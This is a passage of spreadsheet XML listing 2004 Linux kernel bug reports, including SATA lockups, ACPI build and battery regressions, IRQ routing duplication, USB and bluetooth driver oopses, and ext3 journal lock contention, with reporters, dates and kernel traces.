IDE External Designator: External Connector Type: None Port Type: Other Handle 0x0010 DMI type 8, 9 bytes. Port Connector Internal Designator: FDD Internal Connector Type: On Board Floppy External Designator: External Connector Type: None Port Type: U1</t>
  </si>
  <si>
    <t>sata_sil causes hard lockup (possibly infinite loop)</t>
  </si>
  <si>
    <t>2.6.5-rc1</t>
  </si>
  <si>
    <t>2004-03-26 22:35 UTC</t>
  </si>
  <si>
    <t>Adam Nielsen</t>
  </si>
  <si>
    <t>2004-08-08 14:43 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.1 Hardware Environment: Gigabyte 7N400Pro2rev2.0 (nForce2), SI 3512A (bios 4.3.33), Western Digital SATA 120GB (WDC WD1200JD-00G, rev 1.00) Software Environment: Stock Linux kernel (locks up during boot) Problem Description: When accessing the drive (particularly /boot/bzImage) and often during boot just after initialising ReiserFS, the computer will lock hard (keyboard LEDs don't work, SysRq doesn't work, NMI watchdog doesn't trigger an Oops) however my CPU temperature rises considerably (and my BIOS starts beeping a warning) indicating that the CPU is running at 100%. The system worked fine for a week, and then suddenly this happened and I can only occasionally complete booting the kernel now (however the system locks up shortly afterward.) I originally thought ReiserFS might be to blame, but after discussions on the ReiserFS mailing list it seems that the SATA driver is where the problem lies. Steps to reproduce: Boot a Linux 2.6.3 or 2.6.5-rc1 kernel with the Silicon Image 3512A controller, using a WD120GB drive, and it locks up hard either during boot or within a few minutes afterwards. I don't know much about kernel debugging, but I do have access to multiple Linux computers, a serial cable and I can easily compile kernels and boot them over the network on the target machine for testing/debugging.</t>
  </si>
  <si>
    <t>2004-03-27 13:05 UTC</t>
  </si>
  <si>
    <t>gmeymaris</t>
  </si>
  <si>
    <t>2004-04-04 22:19 UTC</t>
  </si>
  <si>
    <t>I am working on a Compaq Presario 2500(2525) working under Debian sarge, kernel 2.4.25, ACPI: Subsystem revision 20040326 When I run using this kernel, with the acpi patch listed above, no bettery is seen by acpi. # cat /proc/acpi/battery/BAT1/state present: no if I reboot using my older kernel 2.4.22, ACPI: Subsystem revision 20031002, it works fine: # cat /proc/acpi/battery/BAT1/state present: yes capacity state: ok charging state: unknown present rate: 0 mA remaining capacity: 2976 mAh present voltage: 16736 mV What's going on? If I can figure out how, I'll attach results from dmesg, dmidecode, acpidmp, and lspci -vv from when I use the 2.4.25 kernel. I ran the same diagnostics when running 2.4.22 kernel, but 3 of the 4 were identical. Only the dmesg was different. I'll attach this good one too. -Greg</t>
  </si>
  <si>
    <t>raid0 fails to start</t>
  </si>
  <si>
    <t>2004-03-29 04:11 UTC</t>
  </si>
  <si>
    <t>Daniel Ahlberg</t>
  </si>
  <si>
    <t>2004-04-05 04:57 UTC</t>
  </si>
  <si>
    <t>I have two SATA disks in an raid0 array as my rootdisk. My own conclusion is that md fails to see any other disks but the first, or stops after 1 disk. This is what's visible on the screen: md: running: &lt;sda3&gt; md0: setting max_sectors to 128, segment boundrary 32767 raid0: looking at sda3 raid0: comparing sda3(79007552) with sda3(79007552) raid0: END raid0: ==&gt; UNIQUE raid0: 1 zones raid0: FINAL 1 zones raid0: too few disks (1 of 2) - aborting! md: pers-&gt;run() failed ... md :do_md_run() returned -22 md: md0 stopped. md: unbind&lt;sda3&gt; md: export_rdev(sda3) md: considering sda1 ... md: adding sda1 ... md: created md1 md: bind&lt;sda1&gt; md: running: &lt;sda1&gt; raid1: raid set md1 active with 1 out of 2 mirrors md: ... autorun DONE. sh-2006: read_supoer_block: read failed (dev md0, block 2, size 4096) sh-2006: read_super_block: bread failed (dev md0, block 16, size 4096) Kernel panic: VFS: Unable to mount root fs on md0 I've also tried 2.6.5-rc2-bk8 with the same result. Reverting back to 2.6.5-rc1 is the only solution.</t>
  </si>
  <si>
    <t>undefined reference to `cmpxchg' for 80386 build</t>
  </si>
  <si>
    <t>2004-03-29 14:18 UTC</t>
  </si>
  <si>
    <t>2004-04-20 20:12 UTC</t>
  </si>
  <si>
    <t>On Sun, 2004-03-28 at 10:24, Arkadiusz Miskiewicz wrote: &gt; ACPI uses cmpxchg so it's not possible to build it for i386 it seems. &gt; &gt; +__acpi_release_global_lock (unsigned int *lock) &gt; +{ &gt; + unsigned int old, new, val; &gt; + do { &gt; + old = *lock; &gt; + new = old &amp; ~0x3; &gt; + val = cmpxchg(lock, old, new); &gt; + } while (unlikely (val != old)); &gt; + return old &amp; 0x1; &gt; +} &gt; &gt; -o vmlinux &gt; drivers/acpi/acpi.o(.text+0x4cf4): In function &gt; `acpi_ev_global_lock_handler': &gt; : undefined reference to `cmpxchg' &gt; drivers/acpi/acpi.o(.text+0x4dc6): In function &gt; `acpi_ev_acquire_global_lock': &gt; : undefined reference to `cmpxchg' &gt; drivers/acpi/acpi.o(.text+0x4e4b): In function &gt; `acpi_ev_release_global_lock': &gt; : undefined reference to `cmpxchg' ACPI unconditionally used cmpxchg before this change also -- from asm(). The asm() was broken, so we replaced it with C, which invokes the cmpxchg macro, which isn't defined for an 80386 build. I guess it is a build bug that the assembler allowed us to invoke cmpxchg in an asm() for an 80386 build in earlier releases. I'm open to suggestions on the right way to fix this. 1. recommend CONFIG_ACPI=n for 80386 build. 2. force CONFIG_ACPI=n for 80386 build. 3. invoke cmpxchg from acpi even for 80386 build. 4. re-implement locks for the 80386 case. I guess it depends on why one would build for 808386 and CONFIG_ACPI=y. Certainly there is no risk of 80386 hardware actually running the CMPXCHG in the ACPI code -- 80386 was EOL'd long before ACPI came out and 2.4.25 (and earlier) would have died on us. I don't like #1 b/c I don't want to get more e-mail like this;-) #2 wouldn't bother me. But if somebody is building for i386 for the purpose for de-tuning the compiler and they really do want ACPI support, it would bother them. #3 would be the old behaviour, which also wouldn't bother me. I guess we'd duplicate the macro inside the ACPI code so that others didn't use it by mistake. #4 would be an academic exercise, since the code would never actually execute on an 80386.</t>
  </si>
  <si>
    <t>cannot mount HD, or interact with hardware</t>
  </si>
  <si>
    <t>2004-03-30 11:19 UTC</t>
  </si>
  <si>
    <t>thewade</t>
  </si>
  <si>
    <t>2004-04-01 08:31 UTC</t>
  </si>
  <si>
    <t>fs_devfs</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 2 Test 1 (1.9) Hardware Environment: Dell Inspiron 8000 Laptop PIII 384MB RAM Software Environment: Fedora Core 2 Test 1 (1.9) Linux 2.6.4 Kernel Problem Description: I rebuild new 2.6.4 kernel fine, but I cannot boot to it. Someone said it looks like my /dev tree is broken because of the build, but I can boot into 2.6.1-1.65 (the kernel that comes with FC2T1) and things work, except my kudzu cant find my ethernet card (proabably because of System.map), but even that works as the os can bring up eth0... I build the kernel WITH ext3 built in, not as a module, so its not the initrd file... The kernel can mount /dev/hda1, but cant open initial console. Thanks for the help in advance, and thanks for such a great Kernel. The 2.6 kernel just seems to run better over all (when I can get it to work)! -thewade Steps to reproduce: Build of new kernel goes fine with ext3 built in (not a module). make clean make xconfig make bzImage make modules make modules_install mkinitrd /boot/initrd-2.6.4.img 2.6.4 cp arch/i386/bzImage /boot/bzImage-2.6.4 cp System.map /boot/System.map-2.6.4 ln -s /boot/System.map-2.6.4 /boot/System.map vi /etc/grub.conf (root=LABEL=/) reboot to 2.6.4 cannot find correct label for root reboot to 2.6.4 changing root=LABEL=/ to root=/dev/hda1 Mounts /dev/hda1 but cannot open initial console (try passing the init= option) as well as not finding hardware (alsa pci soundcard, maestro3 for example)</t>
  </si>
  <si>
    <t>RFE: ACPI debug enhancements</t>
  </si>
  <si>
    <t>2004-03-30 13:30 UTC</t>
  </si>
  <si>
    <t>2004-11-03 18:56 UTC</t>
  </si>
  <si>
    <t>What we need: 1. less expensive build-time option than CONFIG_ACPI_DEBUG that distros can ship enabled by default. 2. ability to set acpi debug flags on boot cmdline particularly to debug boot failures 3. better /proc support ala ipw2100 for better control over run-time debugging. certainly we need to do away with the current hard-coded invocation of acpi_set_debug() from acpi_init().</t>
  </si>
  <si>
    <t>2.6.7</t>
  </si>
  <si>
    <t>Method execution failed [_PRW] ACPICA 20040326 regression</t>
  </si>
  <si>
    <t>2.6.5-rc3-mm2</t>
  </si>
  <si>
    <t>2004-03-31 05:32 UTC</t>
  </si>
  <si>
    <t>2407 2435</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Asus A7V. Previously working like a charm Software Environment: Debian sid Problem Description: New erros leading to non functionnal power button soft off Steps to reproduce: Boot linux 2.6.5-rc3-mm2 on an A7V board with BIOS 1011 ACPI: Subsystem revision 20040326 ACPI: IRQ9 SCI: Level Trigger. ACPI-1133: *** Error: Method execution failed [\SPRW] (Node dffd9220), AE_NOT_EXIST ACPI-1133: *** Error: Method execution failed [\_SB_.PCI0._PRW] (Node dff64720), AE_NOT_EXIST ACPI-0154: *** Error: Method execution failed [\_SB_.PCI0._PRW] (Node dff64720), AE_NOT_EXIST ACPI: Interpreter enabled</t>
  </si>
  <si>
    <t>bit 4 of Byte 3 in IRQ descriptor is missing</t>
  </si>
  <si>
    <t>2004-03-31 05:56 UTC</t>
  </si>
  <si>
    <t>2004-05-11 23:25 UTC</t>
  </si>
  <si>
    <t>Obviously , we need use bit 4 of Byte 3 in IRQ descriptor to distinguish interrupt is sharable.</t>
  </si>
  <si>
    <t>Ralf Hildebrandt</t>
  </si>
  <si>
    <t>IRQ15 -&gt; 0:15 -&gt; 0:15</t>
  </si>
  <si>
    <t>2.6.5-rc3</t>
  </si>
  <si>
    <t>2004-03-31 12:44 UTC</t>
  </si>
  <si>
    <t>2004-04-04 21:22 UTC</t>
  </si>
  <si>
    <t>At early at MADT parse time, mp_config_acpi_legacy_irqs() creates an mp_irqs[] entry for the IRQs &lt; 16. Later at IO-APIC initialization time, setup_IO_APIC_irqs() goes through all the IOAPIC pins, and for each one idx = find_irq_entry(apic,pin,mp_INT) finds the mp_irqs[] index. irq = pin_2_irq(idx, apic, pin) gets the IRQ back from mp_irqs[].srcbusirq add_pin_to_irq(irq, ioapic, pin) adds that pin to the IRQ irq_2_pin pin-map. Later the _PRT is processed, and io_apic_set_pci_routing(apic, pin, gsi, flags) calls add_pin_to_irq(irq, ioapic, pin) before setting up the IOAPIC RTE. The bug is that if the IRQ is &lt; 16, then the pin was added to the IRQ pin-map twice eg. ACPI: PCI Interrupt Link [LM5B] enabled at IRQ 10 IOAPIC[0]: Set PCI routing entry (14-10 -&gt; 0x79 -&gt; IRQ 10 Mode:1 Active:1) 00:02:05[B] -&gt; 14-10 -&gt; IRQ 10 ACPI: PCI Interrupt Link [LM1B] enabled at IRQ 15 IOAPIC[0]: Set PCI routing entry (14-15 -&gt; 0xa1 -&gt; IRQ 15 Mode:1 Active:1) 00:00:01[B] -&gt; 14-15 -&gt; IRQ 15 IRQ to pin mappings: IRQ0 -&gt; 0:0 IRQ1 -&gt; 0:1 IRQ3 -&gt; 0:3 IRQ4 -&gt; 0:4 IRQ5 -&gt; 0:5 IRQ6 -&gt; 0:6 IRQ7 -&gt; 0:7 IRQ8 -&gt; 0:8 IRQ9 -&gt; 0:9 IRQ10 -&gt; 0:10 -&gt; 0:10 IRQ11 -&gt; 0:11 IRQ12 -&gt; 0:12 IRQ13 -&gt; 0:13 IRQ14 -&gt; 0:14 IRQ15 -&gt; 0:15 -&gt; 0:15 This causes all physical access to the IOAPIC at run-time to be done twice, as if two different pins were involved. Unknown if this rough edge causes any actual run-time failures.</t>
  </si>
  <si>
    <t>add-in PCI-bridge card gets no interrupts</t>
  </si>
  <si>
    <t>2004-03-31 13:03 UTC</t>
  </si>
  <si>
    <t>2004-04-04 21:21 UTC</t>
  </si>
  <si>
    <t>Don Fry reports that bug 1564 "proposed final patch" (attachment 2380 [details]) which fixes yenta, breaks 4 NICs in his system that are behind a bridge. Before the patch, the 5 NICS were given IRQs 21,22,26,27,28 After the patch the 5 nics get IRQ 21, 11, 11, 11, 11 and the ones at 11 get no interrupts.</t>
  </si>
  <si>
    <t>USB ehci module load:  segmenation fault after resume</t>
  </si>
  <si>
    <t>2.6.5-rc3-mm4, 2.6.5-mm6</t>
  </si>
  <si>
    <t>2004-03-31 23:58 UTC</t>
  </si>
  <si>
    <t>Guenther Rackl</t>
  </si>
  <si>
    <t>2004-06-11 10:53 UTC</t>
  </si>
  <si>
    <t>Distribution: debian testing Hardware Environment: ibm thinkpad r40 Software Environment: Problem Description: Before suspending my machine, I unload all the USB modules. After resuming, I try to load them again, which works fine for usbcore, usbhid, uhci-hcd and ohci-hcd, but ehci-hcd yields a segmentation fault. Unloading and loading works if there is no suspend in between the actions. Maybe this is similar to bug #2006? Here is the dmesg output: usbcore: registered new driver usblp drivers/usb/class/usblp.c: v0.13: USB Printer Device Class driver PCI: Enabling device 0000:00:1d.7 (0000 -&gt; 0002) PCI: Found IRQ 11 for device 0000:00:1d.7 ehci_hcd 0000:00:1d.7: Intel Corp. 82801DB USB2 PCI: Setting latency timer of device 0000:00:1d.7 to 64 ehci_hcd 0000:00:1d.7: irq 11, pci mem f88fd000 ehci_hcd 0000:00:1d.7: new USB bus registered, assigned bus number 4 ehci_hcd 0000:00:1d.7: init error -19 ehci_hcd 0000:00:1d.7: remove, state 0 Unable to handle kernel NULL pointer dereference at virtual address 00000048 printing eip: f8d95c42 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;f8d95c42&gt;] Tainted: GF VLI EFLAGS: 00010002 (2.6.5-rc3-mm3) EIP is at scan_async+0x42/0x124 [ehci_hcd] eax: 00000000 ebx: f7b25800 ecx: f7b25a0c edx: c03214bc esi: 00000000 edi: f7b25800 ebp: ffffffed esp: f7d2fdd0 ds: 007b es: 007b ss: 0068 Process modprobe (pid: 7709, threadinfo=f7d2f000 task=f7a00130) Stack: c01e8ec9 000039a0 00000096 00000000 00000000 f7b25800 00000000 f7f85400 ffffffed f8d97f56 f7b25800 00000000 f7b25800 f7b25864 f8d97d6b f7b25800 00000000 00000286 00000246 0000002a f7d2fe3c 00000286 c02e4b98 00000001 Call Trace: [&lt;c01e8ec9&gt;] dma_pool_destroy+0xa1/0x16a [&lt;f8d97f56&gt;] ehci_work+0x35/0xbf [ehci_hcd] [&lt;f8d97d6b&gt;] ehci_stop+0x9c/0xbd [ehci_hcd] [&lt;c0115dce&gt;] printk+0x122/0x149 [&lt;f8db1127&gt;] usb_hcd_pci_remove+0x8c/0x162 [usbcore] [&lt;f8db0ed7&gt;] usb_hcd_pci_probe+0x2dd/0x4a1 [usbcore] [&lt;c01ce400&gt;] pci_device_probe_static+0x52/0x61 [&lt;c01ce44a&gt;] __pci_device_probe+0x3b/0x4e [&lt;c01ce489&gt;] pci_device_probe+0x2c/0x4a [&lt;c01e7261&gt;] bus_match+0x3f/0x6a [&lt;c01e7373&gt;] driver_attach+0x56/0x80 [&lt;c01e75f1&gt;] bus_add_driver+0x8b/0x9d [&lt;c01e79cd&gt;] driver_register+0x2f/0x33 [&lt;c01ce645&gt;] pci_register_driver+0x5c/0x84 [&lt;f8898023&gt;] init+0x23/0x30 [ehci_hcd] [&lt;c0129675&gt;] sys_init_module+0x106/0x1cc [&lt;c02943f7&gt;] syscall_call+0x7/0xb Code: 89 44 24 10 8b 87 1c 02 00 00 83 c0 01 85 c0 89 87 1c 02 00 00 75 0a c7 87 1c 02 00 00 01 00 00 00 0f ba b7 18 02 00 00 02 8b 07 &lt;8b&gt; 70 48 85 f6 74 6d 8d 6e 4c 8b 56 4c 39 ea 74 40 8b 87 1c 02 Steps to reproduce:</t>
  </si>
  <si>
    <t>[perf] lock contention on write workload</t>
  </si>
  <si>
    <t>2004-04-01 11:03 UTC</t>
  </si>
  <si>
    <t>2004-11-02 08:20 UTC</t>
  </si>
  <si>
    <t>Distribution: SLES9 B1 Hardware Environment: x440 2.0Ghz 8way 1GB mem. 4 x 2Gbit QLA2300 attached to 4 FAStT700 controller with 140 18GB 15krpm disks configured in 28 4+1 RAID5 logical disks. Software Environment: EVMS/DM using LVM striped regions with 64MB extents and 64k stripes used to create a single 1.8TB logical drive formated with ext3 Problem Description: With 64 parallel sequential write threads ceating 50MB files using a 64k IO size, after a few minutes CPU utilization goes to near 100% system time and throughput drops off. Sample oprofile shows high contention for transaction lock and lots of time in do_get_write_access. vmstat output shows high CPU and highly variable IO throughput. samples % app name symbol name 62682877 30.1249 vmlinux-autobench .text.lock.transaction 20768606 9.9812 vmlinux-autobench do_get_write_access 17682722 8.4982 vmlinux-autobench journal_dirty_metadata 6976488 3.3528 vmlinux-autobench __copy_from_user_ll 4772322 2.2935 vmlinux-autobench journal_add_journal_head 4733443 2.2749 qla2xxx (no symbols) 4634394 2.2273 vmlinux-autobench ext3_try_to_allocate 4447648 2.1375 vmlinux-autobench journal_stop 3909656 1.8790 vmlinux-autobench start_this_handle 3730224 1.7927 vmlinux-autobench journal_dirty_data 3206180 1.5409 vmlinux-autobench try_to_wake_up 3193070 1.5346 vmlinux-autobench __find_get_block 2895585 1.3916 vmlinux-autobench schedule 2367558 1.1378 vmlinux-autobench journal_put_journal_head 1589865 0.7641 vmlinux-autobench clone_endio 1564056 0.7517 vmlinux-autobench journal_commit_transaction 1553142 0.7464 vmlinux-autobench .text.lock.fork 1477001 0.7098 vmlinux-autobench journal_cancel_revoke 1472364 0.7076 vmlinux-autobench prepare_to_wait 1413560 0.6793 vmlinux-autobench journal_get_undo_access 1400083 0.6729 vmlinux-autobench __brelse 1332784 0.6405 vmlinux-autobench dm_request 1204345 0.5788 vmlinux-autobench .text.lock.ll_rw_blk 1119721 0.5381 vmlinux-autobench wake_up_buffer 1062305 0.5105 vmlinux-autobench shrink_zone 1056003 0.5075 vmlinux-autobench __wait_on_buffer 1026335 0.4932 vmlinux-autobench ext3_new_block 1019841 0.4901 vmlinux-autobench unlock_buffer 985205 0.4735 vmlinux-autobench put_io_context 962200 0.4624 vmlinux-autobench ext3_journal_start 941876 0.4527 vmlinux-autobench __journal_file_buffer procs -----------memory---------- ---swap-- -----io---- --system-- ----cpu---- r b swpd free buff cache si so bi bo in cs us sy id wa 67 53 0 7020 10096 953204 0 0 9 737 598 628 0 81 18 1 65 52 0 6444 10312 954028 0 0 3 67809 5884 34764 0 100 0 0 65 57 0 6764 10404 953676 0 0 3 71555 6745 37137 0 99 0 0 67 59 0 6700 10512 953568 0 0 4 37000 3795 21193 0 99 0 0 67 58 0 6700 10648 953172 0 0 3 73837 5960 17310 0 99 0 0 66 56 0 6764 10812 953008 0 0 3 39781 4296 19298 0 99 0 0 65 55 0 6828 10708 953112 0 0 4 65699 5995 30554 0 99 0 0 68 57 0 7084 10616 952684 0 0 3 93669 8073 24970 0 95 4 1 65 52 0 6636 10476 954124 0 0 1 36207 4766 38690 0 100 0 0 65 57 0 6892 10472 953088 0 0 4 88312 7357 19491 0 88 10 2 63 56 0 6700 10396 953164 0 0 1 23391 3366 27624 0 100 0 0 66 56 0 7212 10404 953156 0 0 4 70605 5503 16061 0 92 6 2 Steps to reproduce: start 64 thread creating 50M files using 64 write sizes.</t>
  </si>
  <si>
    <t>2.6.4-rc3 OOPSes on insertion/removal of bluetooth dongle</t>
  </si>
  <si>
    <t>2.6.6-rc1</t>
  </si>
  <si>
    <t>2004-04-01 12:45 UTC</t>
  </si>
  <si>
    <t>Martijn van de Streek</t>
  </si>
  <si>
    <t>2004-11-12 12:53 UTC</t>
  </si>
  <si>
    <t>Distribution: debian unstable Hardware Environment: Asus L7000 OEM laptop (Intel UHCI), bluetooth dongle (worked before) Software Environment: hotplug 0.0.20040329-2, bluez 1.5-2 (debian unstable) Problem Description: When I insert my USB/Bluetooth dongle, the kernel OOPSes on me, and the device doesn't show up in /proc/usb/devices (it doesn't work at all): usb 1-1: new full speed USB device using address 3 Unable to handle kernel NULL pointer dereference at virtual address 00000004 printing eip: c0238fc4 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c0238fc4&gt;] Not tainted EFLAGS: 00010296 (2.6.5-rc3) EIP is at usb_disable_interface+0x14/0x50 eax: cb6280e0 ebx: 00000000 ecx: 00000286 edx: cbfef0a0 esi: 00000002 edi: 00000000 ebp: c98eb800 esp: cbd53d48 ds: 007b es: 007b ss: 0068 Process khubd (pid: 5, threadinfo=cbd52000 task=cbfb2040) Stack: 00001388 0000007b 00000001 00000002 c4496c10 c98eb800 c0239248 c98eb800 cb6280e0 0000000b 00000001 00000002 00000001 00000000 00000000 00001388 00000000 cb6280e0 00000000 c44d1080 c44d1138 c448fd60 c0250a4c c98eb800 Call Trace: [&lt;c0239248&gt;] usb_set_interface+0xb8/0x1a0 [&lt;c0250a4c&gt;] hci_usb_probe+0x23c/0x4b0 [&lt;c0167046&gt;] alloc_inode+0x136/0x140 [&lt;c017ea3e&gt;] sysfs_new_inode+0x5e/0xb0 [&lt;c0233421&gt;] usb_probe_interface+0x61/0x80 [&lt;c01fdfdf&gt;] bus_match+0x3f/0x70 [&lt;c01fe05f&gt;] device_attach+0x4f/0xa0 [&lt;c01fe25b&gt;] bus_add_device+0x5b/0xa0 [&lt;c01fd0a1&gt;] device_add+0xa1/0x130 [&lt;c0239605&gt;] usb_set_configuration+0x1d5/0x270 [&lt;c0234538&gt;] usb_new_device+0x258/0x3d0 [&lt;c0235df3&gt;] hub_port_connect_change+0x183/0x290 [&lt;c02361aa&gt;] hub_events+0x2aa/0x300 [&lt;c0236235&gt;] hub_thread+0x35/0x100 [&lt;c011a990&gt;] default_wake_function+0x0/0x20 [&lt;c0236200&gt;] hub_thread+0x0/0x100 [&lt;c01052ad&gt;] kernel_thread_helper+0x5/0x18 Code: 80 7b 04 00 74 26 31 f6 8d 74 26 00 8b 43 0c 47 0f b6 44 30 Steps to reproduce: Just plugging in my dongle (or having it inserted on boot) triggers the OOPS. Plugging in my USB mouse doesn't.</t>
  </si>
  <si>
    <t>Periodic Journal Flush Insufficient</t>
  </si>
  <si>
    <t>2004-04-02 20:07 UTC</t>
  </si>
  <si>
    <t>Herbert Xu</t>
  </si>
  <si>
    <t>2009-01-17 19:28 UTC</t>
  </si>
  <si>
    <t>I've encountered a problem with the journal flush timer. The problem is that when a filesystem is short on space, relying on a timer-based flushing mechanism is no longer adequate. For example, on my P4 2GHz I can trigger an ENOSPC error by doing while :; do echo test &gt; a; [ -s a ] || break; rm a; done; echo Out of space on an ext3 file system with 12Mb of free space using the usual 5s journal flush timer. Of course, when you extend the flushing period as you do with laptop-mode, this problem becomes a lot worse. In case your shell does not do the loop fast enough to beat the 5s timer, I've attached a C version of the same program that should help in reproducing this bug.</t>
  </si>
  <si>
    <t>touchpad with psmouse.proto=imps doesn't recognize tap event</t>
  </si>
  <si>
    <t>2004-04-04 05:13 UTC</t>
  </si>
  <si>
    <t>Jan Bernatik</t>
  </si>
  <si>
    <t>2004-05-20 07:34 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian stable + backports Hardware Environment: centrino notebook Software Environment: gcc 2.95.4 Problem Description: In 2.6.4 tapping the touchpad with kernel boot option psmouse.proto=imps worked, now it doesn't. I know there is native driver for synaptics touchpad provided outside of kernel. System wasn't changed in any way since I compiled 2.6.4. I'm not sure what other information provide, please let me know what else do you need. Jan</t>
  </si>
  <si>
    <t>Preemption</t>
  </si>
  <si>
    <t>xconfig text is "gibberish"</t>
  </si>
  <si>
    <t>2004-04-04 17:30 UTC</t>
  </si>
  <si>
    <t>Karlan</t>
  </si>
  <si>
    <t>2004-04-07 17:05 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 1 Hardware Environment: P4 Problem Description: xconfig text shows up as square boxes Steps to reproduce: When I try run "make xconfig" after decompressing linux-2.6.5.tar.bz2 to /usr/src I get get gibberish boxes as text.</t>
  </si>
  <si>
    <t>PUT_ENVP incorrect</t>
  </si>
  <si>
    <t>2004-04-05 04:25 UTC</t>
  </si>
  <si>
    <t>2004-04-05 10:36 UTC</t>
  </si>
  <si>
    <t>Distribution: suse linux 9.1 Hardware Environment: i386 Software Environment: ... Problem Description: The PUT_ENVP macro is wrong, it increments buffer by the accumulating length in every step. Steps to reproduce: Check the code of PUT_ENVP</t>
  </si>
  <si>
    <t>Frequent short "pauses" corresponding to multiple battery events</t>
  </si>
  <si>
    <t>2004-04-05 09:48 UTC</t>
  </si>
  <si>
    <t>Stephen Mollett</t>
  </si>
  <si>
    <t>2004-12-29 18:10 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware-based, mostly self-built Hardware Environment: IBM ThinkPad 240 - Celeron Mendocino 300, 192MB RAM Software Environment: Problem Description: System "pauses" for up to a second at a time, approximately every 10-15 seconds when ACPI is enabled. This corresponds to a block of anything up to 10 "battery BAT1 00000080 00000001" events being generated. Running top shows "events/0" clocking up a chunk of CPU time corresponding to the pause duration each time it occurs. Under 2.4.25, the battery events always appear in twos. Steps to reproduce: Simply boot the system with an ACPI-enabled kernel :) I don't know whether it is ThinkPad 240-specific or whether other systems are also affected. The pauses are most noticeable when playing audio or video, but affect everything - when typing, characters will briefly stop being echoed "in real time", then the system will "catch up" when the pause ends.</t>
  </si>
  <si>
    <t>Does not compile with bridge built-in and ATM LANE as module</t>
  </si>
  <si>
    <t>2004-04-05 13:31 UTC</t>
  </si>
  <si>
    <t>2005-02-19 05:42 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing/unstable Hardware Environment: i586 (k6) Software Environment: Reading specs from /usr/lib/gcc-lib/i486-linux/3.3.3/specs Configured with: ../src/configure -v --enable-languages=c,c++,java,f77,pascal,objc,ada,treelang --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-debug --enable-java-gc=boehm --enable-java-awt=xlib,gtk --enable-objc-gc i486-linux Thread model: posix gcc version 3.3.3 (Debian 20040321) Problem Description: When building with bridging as built-in and ATM LANE as module, linking fails with two undefined symbols: CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 net/built-in.o(.init.text+0x4b6c): In function `br_init': : undefined reference to `br_fdb_get_hook' net/built-in.o(.init.text+0x4b76): In function `br_init': : undefined reference to `br_fdb_put_hook' net/built-in.o(.exit.text+0x13db): In function `br_deinit': : undefined reference to `br_fdb_put_hook' net/built-in.o(.exit.text+0x13ef): In function `br_deinit': : undefined reference to `br_fdb_get_hook' make[1]: *** [.tmp_vmlinux1] Error 1 make[1]: Leaving directory `/root/linux/linux-2.6.5' make: *** [stamp-build] Error 2 Steps to reproduce: Use attached .config</t>
  </si>
  <si>
    <t>Help page for "CONFIG_NET_IPIP" needs update</t>
  </si>
  <si>
    <t>2004-04-06 08:46 UTC</t>
  </si>
  <si>
    <t>2004-07-12 06:08 UTC</t>
  </si>
  <si>
    <t>Help page for "CONFIG_NET_IPIP" refers to web page: http://anchor.cs.binghamton.edu/~mobileip/LJ/index.html Which isn't accessible (And hasn't been for some time). Mozilla reports "anchor.cs.binghamton.edu could not be found."</t>
  </si>
  <si>
    <t>kernel panic on rmmod acpi modules due to /proc references</t>
  </si>
  <si>
    <t>Linux 2.6.5-rc2</t>
  </si>
  <si>
    <t>2004-04-06 10:21 UTC</t>
  </si>
  <si>
    <t>Anil S Keshavamurthy</t>
  </si>
  <si>
    <t>2004-05-11 23:33 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment:Tiger4(IA64 platform) Software Environment:linux kernel 2.6.5-rc2 Problem Description:can't rmmod processor.ko Steps to reproduce: Compile the acpi processor driver as a module by having CONFIG_ACPI_PROCESSOR=m. And do insmod processor.ko and then rmmod processor.ko. The rmmod processor.ko panics the kernel thread which is performing rmmod.</t>
  </si>
  <si>
    <t>SATA fails in PIC mode, okay in APIC mode -- Abit VIA</t>
  </si>
  <si>
    <t>2004-04-06 15:34 UTC</t>
  </si>
  <si>
    <t>Andrzej Szelachowski</t>
  </si>
  <si>
    <t>2004-12-01 06:07 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 9.1 Hardware Environment: ABIT KV7 (VIA chipset) with Duron 1600. My HDD is Seagate SATA 80GB. Problem Description: I had problems to make 2.6.X kernels use my SATA disk. After some investigation and suggestions from Len Brown I dicovered the following: * Only with "acpi=off" or "pci=noacpi" system works properly * the bug is not visibile when: Local APIC support on uniprocessors (X86_UP_APIC) and under it IO-APIC support on uniprocessors (X86_UP_IOAPIC) are enabled either direclty or by enabling Processor type and features -&gt; Symmetric multi-processing support (SMP) best regards Andrzej</t>
  </si>
  <si>
    <t>Toshiba acpi driver didn't use acpi-disabled</t>
  </si>
  <si>
    <t>2004-04-07 00:19 UTC</t>
  </si>
  <si>
    <t>when acpi=off, toshiba acpi driver will generate garbage info.</t>
  </si>
  <si>
    <t>cdc_acm not creating /dev/usb/acm/0</t>
  </si>
  <si>
    <t>2.6.5-mm1</t>
  </si>
  <si>
    <t>2004-04-07 02:16 UTC</t>
  </si>
  <si>
    <t>Altug Ozpineci</t>
  </si>
  <si>
    <t>2004-05-11 10:21 UTC</t>
  </si>
  <si>
    <t>Distribution:Slackware 9.1 Hardware Environment: Compaq Presario 908EA Software Environment: Problem Description: I'm using a Motorola C300 series cellular phone for GPRS connection. in the Linus Tree, the cdc_acm module works fine with the modem. After modprobing the module, i get a /dev/usb/acm/0 entry. But when i patch with the mm patch, and modprobe the module, there are no warning messages, the module is loaded (i can see it with lsmod), but i don't get the /dev/usb/acm/0 entry. I tried to see if the name was changed, but no new entries are created under /dev. when i type lsusb, i see that my cellular phone is listed and i have an entry in /proc/bus/usb/devices for my cellular phone. Steps to reproduce:</t>
  </si>
  <si>
    <t>Wang, Zhenyu Z</t>
  </si>
  <si>
    <t>SNDRV_DMA_TYPE_PCI should be SNDRV_DMA_TYPE_DEV ... breaks sparc audio</t>
  </si>
  <si>
    <t>2004-04-08 09:44 UTC</t>
  </si>
  <si>
    <t>Jeremy Huddleston</t>
  </si>
  <si>
